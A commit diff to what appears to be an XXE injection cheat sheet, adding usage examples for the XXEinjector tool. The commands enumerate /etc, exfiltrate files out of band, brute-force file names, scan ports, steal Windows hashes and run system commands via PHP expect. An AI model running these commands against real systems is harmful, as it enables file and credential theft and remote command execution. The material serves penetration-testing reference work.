commit
b25694239b
|
@ -42,7 +42,31 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
|
|||
```
|
||||
$ python3 230.py 2121
|
||||
```
|
||||
|
||||
- [XXEinjector](https://github.com/enjoiz/XXEinjector)
|
||||
```bash
|
||||
# Enumerating /etc directory in HTTPS application:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl
|
||||
# Enumerating /etc directory using gopher for OOB method:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher
|
||||
# Second order exploitation:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt
|
||||
# Bruteforcing files using HTTP out of band method and netdoc protocol:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc
|
||||
# Enumerating using direct exploitation:
|
||||
ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK
|
||||
# Enumerating unfiltered ports:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all
|
||||
# Stealing Windows hashes:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes
|
||||
# Uploading files using Java jar:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf
|
||||
# Executing system commands using PHP expect:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls
|
||||
# Testing for XSLT injection:
|
||||
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt
|
||||
# Log requests only:
|
||||
ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt
|
||||
```
|
||||
|
||||
## Detect the vulnerability
|
||||
|
||||
|
@ -454,4 +478,4 @@ updating: xl/sharedStrings.xml (deflated 17%)
|
|||
* [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
|
||||
* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe)
|
||||
- [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation)
|
||||
- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/)
|
||||
- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/)
|
||||
|
|
Loading…
Reference in New Issue